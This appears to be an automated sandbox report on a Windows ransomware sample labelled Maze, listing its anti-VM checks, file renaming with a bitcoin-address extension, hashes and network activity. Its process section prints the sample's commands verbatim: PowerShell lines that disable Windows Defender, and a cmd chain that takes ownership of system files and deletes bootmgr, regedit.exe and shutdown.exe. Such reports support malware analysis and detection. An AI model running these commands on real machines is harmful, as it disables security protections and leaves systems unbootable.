Analysis Overview
SHA256
ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1
Threat Level: Known bad
The file UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe was found to be: Known bad.
Malicious Activity Summary
Maze
Contains code to disable Windows Defender
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Possible privilege escalation attempt
Executes dropped EXE
Disables Task Manager via registry modification
Modifies extensions of user files
Checks BIOS information in registry
Modifies file permissions
Themida packer
Checks computer location settings
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-09-20 05:03
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-09-20 05:03
Reported
2022-09-20 05:08
Platform
win7-20220812-en
Max time kernel
139s
Max time network
52s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Maze
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\DisconnectSkip.crw => C:\Users\Admin\Pictures\DisconnectSkip.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ResolveUnblock.crw => C:\Users\Admin\Pictures\ResolveUnblock.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
Network
Files
memory/1992-54-0x0000000000EA0000-0x0000000001316000-memory.dmp
memory/1992-55-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
memory/1312-58-0x0000000000000000-mapping.dmp
memory/1476-59-0x0000000000000000-mapping.dmp
memory/1712-57-0x0000000000000000-mapping.dmp
memory/1492-56-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fb8901bfb5eb8b5cd51c393f6e11ea2e |
| SHA1 | 659d7e2e79485eb006372ff061fdffe0961f5e43 |
| SHA256 | bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209 |
| SHA512 | 82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fb8901bfb5eb8b5cd51c393f6e11ea2e |
| SHA1 | 659d7e2e79485eb006372ff061fdffe0961f5e43 |
| SHA256 | bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209 |
| SHA512 | 82e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49 |
memory/832-68-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
| MD5 | e4f24d91d8e7290ffd6afc8aa01c6d63 |
| SHA1 | b552c6af33cc5a62379028687924406cba8ff74d |
| SHA256 | 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb |
| SHA512 | ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00 |
memory/832-70-0x0000000000280000-0x0000000000AF4000-memory.dmp
memory/832-71-0x0000000075281000-0x0000000075283000-memory.dmp
memory/832-72-0x0000000000280000-0x0000000000AF4000-memory.dmp
memory/832-76-0x00000000770A0000-0x0000000077220000-memory.dmp
memory/1712-64-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
memory/1476-77-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
memory/1312-73-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
memory/1492-66-0x000007FEEC170000-0x000007FEECB93000-memory.dmp
memory/1476-82-0x0000000002864000-0x0000000002867000-memory.dmp
memory/1712-84-0x0000000002684000-0x0000000002687000-memory.dmp
memory/1492-83-0x00000000024B4000-0x00000000024B7000-memory.dmp
memory/1312-85-0x0000000002534000-0x0000000002537000-memory.dmp
memory/832-86-0x0000000000280000-0x0000000000AF4000-memory.dmp
memory/832-87-0x0000000000280000-0x0000000000AF4000-memory.dmp
memory/1492-79-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
memory/1712-80-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
memory/1312-81-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
memory/1476-78-0x000007FEEB610000-0x000007FEEC16D000-memory.dmp
memory/1492-88-0x000000001B740000-0x000000001BA3F000-memory.dmp
memory/1312-91-0x000000001B950000-0x000000001BC4F000-memory.dmp
memory/1712-90-0x000000001B840000-0x000000001BB3F000-memory.dmp
memory/1476-89-0x000000001B860000-0x000000001BB5F000-memory.dmp
memory/1312-92-0x000000000253B000-0x000000000255A000-memory.dmp
memory/1492-93-0x00000000024BB000-0x00000000024DA000-memory.dmp
memory/1476-94-0x000000000286B000-0x000000000288A000-memory.dmp
memory/1476-97-0x000000000286B000-0x000000000288A000-memory.dmp
memory/1476-96-0x0000000002864000-0x0000000002867000-memory.dmp
memory/1712-95-0x000000000268B000-0x00000000026AA000-memory.dmp
memory/1312-98-0x0000000002534000-0x0000000002537000-memory.dmp
memory/1712-100-0x0000000002684000-0x0000000002687000-memory.dmp
memory/1712-101-0x000000000268B000-0x00000000026AA000-memory.dmp
memory/1312-99-0x000000000253B000-0x000000000255A000-memory.dmp
memory/1492-102-0x00000000024B4000-0x00000000024B7000-memory.dmp
memory/1492-103-0x00000000024BB000-0x00000000024DA000-memory.dmp
memory/772-104-0x0000000000000000-mapping.dmp
memory/108-105-0x0000000000000000-mapping.dmp
memory/540-106-0x0000000000000000-mapping.dmp
memory/1772-107-0x0000000000000000-mapping.dmp
memory/1408-108-0x0000000000000000-mapping.dmp
memory/1796-109-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-20 05:03
Reported
2022-09-20 05:08
Platform
win10v2004-20220812-en
Max time kernel
173s
Max time network
195s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Maze
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies extensions of user files
| Description | Indicator | Process | Target |
| File renamed | C:\Users\Admin\Pictures\CloseMove.png => C:\Users\Admin\Pictures\CloseMove.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\JoinAssert.crw => C:\Users\Admin\Pictures\JoinAssert.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OutRedo.png => C:\Users\Admin\Pictures\OutRedo.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RevokeProtect.png => C:\Users\Admin\Pictures\RevokeProtect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SendTrace.png => C:\Users\Admin\Pictures\SendTrace.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SetDisconnect.png => C:\Users\Admin\Pictures\SetDisconnect.png.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\VSSVC.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32 /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\drivers
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\System32\drivers /grant Admin:F
C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\LogonUI.exe
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.220.29:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| NL | 13.69.109.130:443 | tcp |
Files
memory/3176-132-0x0000000000530000-0x00000000009A6000-memory.dmp
memory/3176-133-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4216-134-0x0000000000000000-mapping.dmp
memory/1772-135-0x0000000000000000-mapping.dmp
memory/4480-136-0x0000000000000000-mapping.dmp
memory/3928-137-0x0000000000000000-mapping.dmp
memory/4216-138-0x00000261FADE0000-0x00000261FAE02000-memory.dmp
memory/4664-139-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
| MD5 | e4f24d91d8e7290ffd6afc8aa01c6d63 |
| SHA1 | b552c6af33cc5a62379028687924406cba8ff74d |
| SHA256 | 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb |
| SHA512 | ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00 |
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
| MD5 | e4f24d91d8e7290ffd6afc8aa01c6d63 |
| SHA1 | b552c6af33cc5a62379028687924406cba8ff74d |
| SHA256 | 5eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb |
| SHA512 | ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00 |
memory/4216-142-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/1772-143-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4480-144-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/3928-145-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4664-146-0x0000000000530000-0x0000000000DA4000-memory.dmp
memory/3928-149-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4664-150-0x0000000077520000-0x00000000776C3000-memory.dmp
memory/4664-151-0x0000000000530000-0x0000000000DA4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/4480-155-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4216-156-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4664-157-0x0000000000530000-0x0000000000DA4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e243a38635ff9a06c87c2a61a2200656 |
| SHA1 | ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc |
| SHA256 | af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f |
| SHA512 | 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4 |
memory/4664-159-0x0000000005EC0000-0x0000000006464000-memory.dmp
memory/4664-160-0x0000000005850000-0x00000000058E2000-memory.dmp
memory/1772-161-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4664-162-0x0000000005A10000-0x0000000005A1A000-memory.dmp
memory/3176-163-0x00007FFDCF4A0000-0x00007FFDCFF61000-memory.dmp
memory/4664-164-0x0000000000530000-0x0000000000DA4000-memory.dmp
memory/4664-165-0x0000000077520000-0x00000000776C3000-memory.dmp
memory/4324-166-0x0000000000000000-mapping.dmp
memory/2888-167-0x0000000000000000-mapping.dmp
memory/424-168-0x0000000000000000-mapping.dmp
memory/4988-169-0x0000000000000000-mapping.dmp
memory/3868-170-0x0000000000000000-mapping.dmp
memory/2184-171-0x0000000000000000-mapping.dmp